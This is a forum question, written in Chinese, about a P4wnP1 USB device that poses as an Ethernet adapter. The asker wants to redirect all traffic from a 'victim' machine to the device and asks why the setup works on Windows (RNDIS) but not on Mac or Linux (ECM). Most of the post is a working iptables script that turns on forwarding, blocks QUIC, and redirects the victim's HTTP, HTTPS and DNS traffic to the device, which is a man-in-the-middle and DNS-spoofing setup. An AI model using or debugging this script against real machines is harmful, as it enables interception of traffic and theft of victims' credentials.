我有一个可以模拟以太网适配器并运行linux的设备(与Bash Bunny不同)。
我想将所有流量从它连接到的机器(受害者)重定向到设备本身。我尝试使用IPtables,它只能在Windows(RNDIS)而不是Mac或Linux(ECM)上运行。我想了解为什么会发生这种情况,因为除了LAN上的Dnsspoofing之外我找不到任何特定的IPtables示例。 我现在使用的代码是:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A INPUT -i usb1 -p udp --dport 443 -j DROP
iptables -A FORWARD -i usb1 -p udp --dport 53 -j ACCEPT
iptables -A FORWARD -i usb1 -p udp --sport 53 -j ACCEPT
iptables -A INPUT -i usb0 -p udp --dport 443 -j DROP
iptables -A FORWARD -i usb0 -p udp --dport 53 -j ACCEPT
iptables -A FORWARD -i usb0 -p udp --sport 53 -j ACCEPT
iptables -t nat -A PREROUTING -i usb1 -p tcp --dport 443 -j DNAT --to-destination $IF_IP:80
iptables -t nat -A PREROUTING -i usb1 -p tcp --dport 80 -j DNAT --to-destination $IF_IP:80
iptables -t nat -A PREROUTING -i usb1 -p udp --dport 53 -j DNAT --to-destination $IF_IP:53
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 443 -j DNAT --to-destination $IF_IP:80
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j DNAT --to-destination $IF_IP:80
iptables -t nat -A PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to-destination $IF_IP:53
iptables -t nat -A POSTROUTING -j MASQUERADE
P.S:设备是P4wnP1:https://github.com/mame82/P4wnP1